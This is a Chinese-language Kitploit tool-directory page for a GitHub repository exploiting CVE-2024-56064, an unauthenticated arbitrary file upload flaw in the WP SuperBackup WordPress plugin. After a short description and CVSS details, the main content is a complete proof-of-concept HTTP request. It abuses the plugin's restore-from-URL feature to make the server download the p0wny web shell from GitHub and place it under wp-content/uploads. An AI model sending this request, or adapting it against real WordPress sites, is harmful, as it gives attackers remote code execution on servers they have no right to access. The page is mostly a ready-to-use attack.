Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-56064 — WP SuperBackup <= 2.3.3 - 未认证任意文件上传 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-56064
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubrandomrobbiebf/cve-2024-56064

CVE-2024-56064

WP SuperBackup <= 2.3.3 - 未认证任意文件上传

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-56064

WP SuperBackup <= 2.3.3 - 未认证任意文件上传

描述

Super Backup & Clone - Migrate for WordPress 插件在所有版本(直至并包括 2.3.3)中因缺少文件类型验证而存在任意文件上传漏洞。这使得未经身份验证的攻击者能够在受影响站点的服务器上上传任意文件,从而可能实现远程代码执行。

详细信息

  • 类型: 插件
  • Slug: indeed-wp-superbackup
  • 受影响版本: 2.3.3
  • CVSS 分数: 9.8
  • CVSS 评级: 严重
  • CVSS 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-56064
  • 状态: 私有

POC

Shell 需要一段时间才会出现.... 它将出现在 /wp-content/uploads/isnapshots/shell.php

root@kitploit:~
POST /wp-admin/admin.php?page=ibk_admin&tab=restore HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal:8929/wp-admin/admin.php?page=ibk_admin&tab=restore
Content-Type: multipart/form-data; boundary=---------------------------24461452295617717774000608677
Content-Length: 688
Origin: http://kubernetes.docker.internal:8929
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="ibk_restore_migrate_action"

1
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_type"

restore_url
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_url"

https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="upload_file"; filename=""
Content-Type: application/octet-stream


-----------------------------24461452295617717774000608677--

下载工具